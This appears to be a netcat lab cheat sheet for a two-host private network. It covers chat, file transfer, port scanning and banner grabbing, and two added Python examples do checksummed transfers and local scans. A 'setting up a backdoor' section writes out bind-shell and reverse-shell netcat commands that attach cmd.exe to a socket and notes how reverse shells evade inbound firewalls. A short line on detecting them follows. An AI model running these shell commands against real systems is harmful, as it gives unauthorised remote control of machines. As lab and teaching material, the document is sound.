Windows:192.168.2.1
Ubuntu:192.168.2.9
client/server (plain connection, relays stdin/stdout between both ends like a chat):
(W) server:
nc -l -p 4444    // -l listen, -p local port
(U) client:
nc 192.168.2.1 4444
remote shell:
(W) server: nc -l -p 4444 -e cmd.exe    // -e runs a program and attaches its stdin/stdout to the connection: a bind-shell backdoor
(U) client: nc 192.168.2.1 4444
// -e exists in the Windows build and in netcat-traditional only; OpenBSD netcat (the Ubuntu default) does not have it, see the nc -h output at the end.
file transfer:
c->s
(W) server: nc -l -p 4444 > out.file
(U) client: nc 192.168.2.1 4444 < input.file
s->c
(W) server: nc -l -p 4444 < input.file
(U) client: nc 192.168.2.1 4444 > out.file
// neither end knows when the file is complete: the sender reaches EOF on stdin, but the receiver keeps the socket open until the peer closes it or it is interrupted. Give the sender -q (netcat-traditional/Debian: quit N s after stdin EOF) or -w so it closes, and compare checksums of input.file and out.file afterwards; nc itself gives no integrity check.
set timeout:
-w3    // give up a connect, or the final network read, after 3 s
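The transfer above, reproduced in Python as an added example (not code from the notes) to show the two things the nc pipeline leaves to the operator: the sender closes its write half once the file is sent so the receiver sees EOF and exits, and both ends compare a SHA-256 of the file. The host, port, file names and file contents are constructed for the demo.

```python
"""File transfer over a raw TCP stream with an end-to-end checksum.

Added example, not from the notes: it does what `nc -l -p 4444 > out.file`
and `nc host 4444 < input.file` do, plus a clean close at EOF and a checksum
comparison. Host, port, file names and contents are constructed for the demo."""
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 64 * 1024


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks (the post-transfer check)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def start_receiver(out_path, host="127.0.0.1"):
    """Receiver side of `nc -l -p PORT > out.file`: bind an ephemeral port and,
    in a background thread, accept one connection and write the stream to
    out_path until the peer closes. Returns (port, thread)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        srv.close()
        with conn, open(out_path, "wb") as f:
            while True:
                data = conn.recv(CHUNK)
                if not data:        # peer sent FIN: the transfer is complete
                    break
                f.write(data)

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, t


def send_file(host, port, in_path, timeout=3.0):
    """Sender side of `nc host PORT < input.file`. Streams the file, then shuts
    down the write half so the receiver sees EOF (what nc needs -q/-w for).
    Returns the number of bytes sent."""
    sent = 0
    with socket.create_connection((host, port), timeout=timeout) as s, \
            open(in_path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            s.sendall(block)
            sent += len(block)
        s.shutdown(socket.SHUT_WR)
    return sent


def transfer_and_verify(in_path, out_path, host="127.0.0.1"):
    """Run one complete transfer and return (bytes_sent, checksums_match)."""
    port, t = start_receiver(out_path, host)
    sent = send_file(host, port, in_path)
    t.join(timeout=10)
    return sent, sha256_of(in_path) == sha256_of(out_path)


def demo():
    """Constructed input: 300 KiB of random bytes in a temporary directory."""
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "input.file"), os.path.join(d, "out.file")
    with open(src, "wb") as f:
        f.write(os.urandom(300 * 1024))
    return transfer_and_verify(src, dst)


if __name__ == "__main__":
    print(demo())
```

`shutdown(SHUT_WR)` is the programmatic equivalent of the sender's `-q 0`: the receiver gets a FIN and stops reading on its own instead of waiting for a Ctrl-C, and the hash comparison catches a truncated or interrupted copy that a bare `>` redirect would silently accept.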
port scan
nc -v -n -z -w1 [ip_addr] [port]
-v : verbose, report errors and the result of each connection attempt
-n : no DNS resolution of the target, use the IP as given
-z : zero I/O, connect and close without sending data; makes scanning faster
-w1: 1 s timeout
scan a Linux host for open ports (from Windows)
(W) nc -n -v -w1 -z 192.168.2.9 1-65535
banner grabbing
(U) echo "" | nc -v -n -w1 192.168.2.1 1-1000
// do not add -z here: zero-I/O mode closes each connection before anything is read, so with -z this is just the port scan again. Without -z, nc sends the newline and prints whatever each open service answers (an SSH or SMTP greeting, for example); services that wait for the client to speak first return nothing within the -w1 timeout.
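Port scan and banner grab as an added example in Python (not code from the notes), so the difference between the -z scan and the banner grab can be seen offline: two constructed local services are started, one that greets with a fake SSH banner and one that stays silent, plus a port that nothing listens on. Hosts and ports are chosen at run time and are not the 192.168.2.x addresses in the notes.

```python
"""Port scan and banner grab, mirroring `nc -z -w1` and `echo "" | nc -w1`.

Added example, not from the notes. The services it scans are constructed
stand-ins started locally; ports are ephemeral and chosen at run time."""
import socket
import threading

HOST = "127.0.0.1"


def start_service(banner, host=HOST):
    """Constructed stand-in for a daemon: accept clients, read whatever they
    send first, answer with `banner` (possibly empty) and close.
    Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.settimeout(1.0)
                    conn.recv(1024)          # drain the client's probe first
                    if banner:
                        conn.sendall(banner)
                except OSError:
                    pass                     # client already gone (-z style connect+close)

    threading.Thread(target=serve, daemon=True).start()
    return port


def closed_port(host=HOST):
    """Pick a port nothing listens on: bind an ephemeral one, note it, release it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def port_open(host, port, timeout=1.0):
    """`nc -z -w<timeout> host port`: complete the TCP handshake, send nothing,
    close. True if the connect succeeded within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(host, ports, timeout=1.0):
    """`nc -z -w1 host lo-hi`: the open ports among `ports`, in input order."""
    return [p for p in ports if port_open(host, p, timeout)]


def grab_banner(host, port, timeout=1.0, probe=b"\r\n"):
    """`echo "" | nc -w<timeout> host port` WITHOUT -z: connect, send the probe,
    read until the service closes or the timeout expires.
    Returns the banner bytes, b"" for an open but silent port, None if closed."""
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return None
    chunks = []
    with s:
        try:
            s.sendall(probe)
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except OSError:        # timeout or reset: keep whatever arrived
            pass
    return b"".join(chunks)


def demo():
    ssh = start_service(b"SSH-2.0-OpenSSH_demo\r\n")   # constructed banner
    silent = start_service(b"")
    closed = closed_port()
    return {
        "open": scan(HOST, [ssh, silent, closed]),
        "banners": {p: grab_banner(HOST, p) for p in (ssh, silent, closed)},
    }


if __name__ == "__main__":
    print(demo())
```

`port_open` is the -z scan: it learns only that the handshake completed. `grab_banner` is the same connection without -z; the probe newline is what `echo ""` supplies, and the read loop ends either on the service closing or on the -w style timeout, which is why a silent service shows up as open but bannerless rather than hanging the scan.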
setting up a backdoor:
-e redirects the standard I/O streams of the program to the socket
listening (bind) backdoor: the victim listens, the attacker connects in
(W) server: nc -l -p 4444 -e cmd.exe
(U) client: nc 192.168.2.1 4444
connecting (reverse) backdoor: the attacker listens, the victim connects out, which gets through firewalls/NAT that only block inbound connections
(U) server: nc -l -p 4444
(W) client: nc -e cmd.exe 192.168.2.9 4444
// on the defender's side a bind backdoor shows up as an unexpected listener (netstat -ano on Windows, ss -ltnp on Linux); a reverse one shows up as an outbound connection owned by nc with cmd.exe as its child.
s@ubuntu:~$ nc -h
OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-b Allow broadcast
-C Send CRLF as line-ending
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-I length TCP receive buffer length
-i secs Delay interval for lines sent, ports scanned
-j Use jumbo frame
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-O length TCP send buffer length
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T toskeyword Set IP Type of Service
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-V rtable Specify alternate routing table
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-Z DCCP mode
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]